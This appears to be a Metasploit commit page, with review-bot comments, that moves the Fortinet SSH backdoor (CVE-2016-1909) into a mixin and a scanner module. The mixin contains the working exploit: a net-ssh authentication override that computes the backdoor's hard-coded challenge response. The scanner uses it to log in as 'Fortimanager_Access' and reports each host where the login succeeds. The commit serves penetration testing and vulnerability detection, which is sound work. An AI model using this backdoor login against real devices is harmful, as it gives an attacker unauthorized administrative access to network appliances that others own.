Move Fortinet backdoor to module and mixin
Showing
5 changed files
with
159 additions
and
96 deletions.
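--- /dev/null
+++ b/MIXIN_PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,95 @@
+# -*- coding: binary -*-
+
+require 'net/ssh'
+
+module Msf::Exploit::Remote::Fortinet
+class Net::SSH::Authentication::Methods::KeyboardInteractive < Net::SSH::Authentication::Methods::Abstract
+
+# https://www.ietf.org/rfc/rfc4256.txt
+def authenticate(service_name, username, password = nil)
+debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
+
+send_message(userauth_request(
+=begin
+string user name (ISO-10646 UTF-8, as defined in [RFC-3629])
+string service name (US-ASCII)
+string "keyboard-interactive" (US-ASCII)
+string language tag (as defined in [RFC-3066])
+string submethods (ISO-10646 UTF-8)
+=end
+username,
+service_name,
+'keyboard-interactive',
+'',
+''
+))
+
+loop do
+message = session.next_message
+
+case message.type
+when USERAUTH_SUCCESS
+debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
+return true
+when USERAUTH_FAILURE
+debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
+return false
+when USERAUTH_INFO_REQUEST
+debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
+
+=begin
+string name (ISO-10646 UTF-8)
+string instruction (ISO-10646 UTF-8)
+string language tag (as defined in [RFC-3066])
+int num-prompts
+string prompt[1] (ISO-10646 UTF-8)
+boolean echo[1]
+...
+string prompt[num-prompts] (ISO-10646 UTF-8)
+boolean echo[num-prompts]
+=end
+name = message.read_string
+instruction = message.read_string
+_ = message.read_string
+
+prompts = []
+
+message.read_long.times do
+prompt = message.read_string
+echo = message.read_bool
+prompts << [prompt, echo]
+end
+
+debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }
+
+send_message(Net::SSH::Buffer.from(
+=begin
+byte SSH_MSG_USERAUTH_INFO_RESPONSE
+int num-responses
+string response[1] (ISO-10646 UTF-8)
+...
+string response[num-responses] (ISO-10646 UTF-8)
+=end
+:byte, USERAUTH_INFO_RESPONSE,
+:long, 1,
+:string, custom_handler(name, instruction, prompts)
+))
+else
+raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
+end
+end
+end
+
+# http://seclists.org/fulldisclosure/2016/Jan/26
+def custom_handler(title, instructions, prompt_list)
+n = prompt_list[0][0]
+m = Digest::SHA1.new
+m.update("\x00" * 12)
+m.update(n + 'FGTAbc11*xy+Qqz27')
+m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
+h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
+[h]
+end
+
+end
+end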
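Review bot: The `class Net::SSH::Authentication::Methods::KeyboardInteractive < ...` line inside `module Msf::Exploit::Remote::Fortinet` does not scope the class to the mixin — the fully qualified constant path resolves to net-ssh's global class, so this `authenticate` and the hard-coded `custom_handler` answer replace keyboard-interactive authentication for every SSH connection in the process once the file is loaded, while the module body itself defines nothing that `include` would bring into a module. A less invasive shape is an `Abstract` subclass under a new constant selected through `auth_methods` (as I read net-ssh, method names are resolved to constants under `Methods`), or failing that a header comment such as `# NOTE: reopens net-ssh's KeyboardInteractive; the override applies to all SSH logins in this process, not only Fortinet targets`. `custom_handler` indexes `prompt_list[0][0]` with no guard for the zero-prompt case RFC 4256 allows, and the `:long, 1` response count is fixed rather than derived from the responses; a `return [] if prompt_list.empty?` guard plus `responses = custom_handler(name, instruction, prompts)` followed by `:long, responses.length,` and `:string, responses` keeps the reply well-formed. `Digest::SHA1` and `Base64` are used while only `net/ssh` is required here; the framework presumably loads them elsewhere, but `require 'digest/sha1'` and `require 'base64'` would make the mixin self-contained.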
|
@@ -116,3 +116,6 @@ | |
|
||
# Kerberos Support | ||
require 'msf/core/exploit/kerberos/client' | ||
|
||
# Fortinet | ||
require 'msf/core/exploit/fortinet' |
This file was deleted.
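--- /dev/null
+++ b/MODULE_PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,61 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Auxiliary
+
+include Msf::Exploit::Remote::Fortinet
+include Msf::Auxiliary::Scanner
+include Msf::Auxiliary::Report
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Fortinet Backdoor Scanner',
+'Description' => %q{
+This module scans for the Fortinet backdoor.
+},
+'Author' => [
+'operator8203 <operator8203[at]runbox.com>', # PoC
+'wvu' # Module
+],
+'References' => [
+['CVE', '2016-1909'],
+['EDB', '39224'],
+['PACKETSTORM', '135225'],
+['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
+['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
+],
+'DisclosureDate' => 'Jan 09 2016',
+'License' => MSF_LICENSE
+))
+
+register_options([
+Opt::RPORT(22)
+])
+end
+
+def run_host(ip)
+ssh = Net::SSH.start(
+ip,
+'Fortimanager_Access',
+port: datastore['RPORT'],
+auth_methods: ['keyboard-interactive']
+)
+
+if ssh
+print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
+report_vuln(
+:host => ip,
+:name => self.name,
+:refs => self.references,
+:info => ssh.transport.server_version.version
+)
+end
+end
+
+def rport
+datastore['RPORT']
+end
+
+end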
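Review bot: `Net::SSH.start` in `run_host` never returns a falsy value — it either returns a session or raises (`Net::SSH::AuthenticationFailed` when the host rejects the login, a socket error when it is unreachable) — so the `if ssh` test cannot express "not vulnerable" and every clean host ends its scan in an exception instead of a result. Catching the expected failure, `rescue Net::SSH::AuthenticationFailed` with `vprint_status("#{ip}:#{rport} - Not vulnerable")`, makes the per-host outcome explicit, and a `timeout:` option on the connection would keep a silent host from holding a scanner thread. The session obtained on success is also never closed; the block form of `Net::SSH.start` releases it after `report_vuln` runs. The method-level rescue below shows the shape; the argument list and the success branch are unchanged.
```ruby
def run_host(ip)
  Net::SSH.start(
    # … unchanged: ip, username, port and auth_methods arguments …
  ) do |ssh|
    # … unchanged: print_good and report_vuln …
  end
rescue Net::SSH::AuthenticationFailed
  vprint_status("#{ip}:#{rport} - Not vulnerable")
end
```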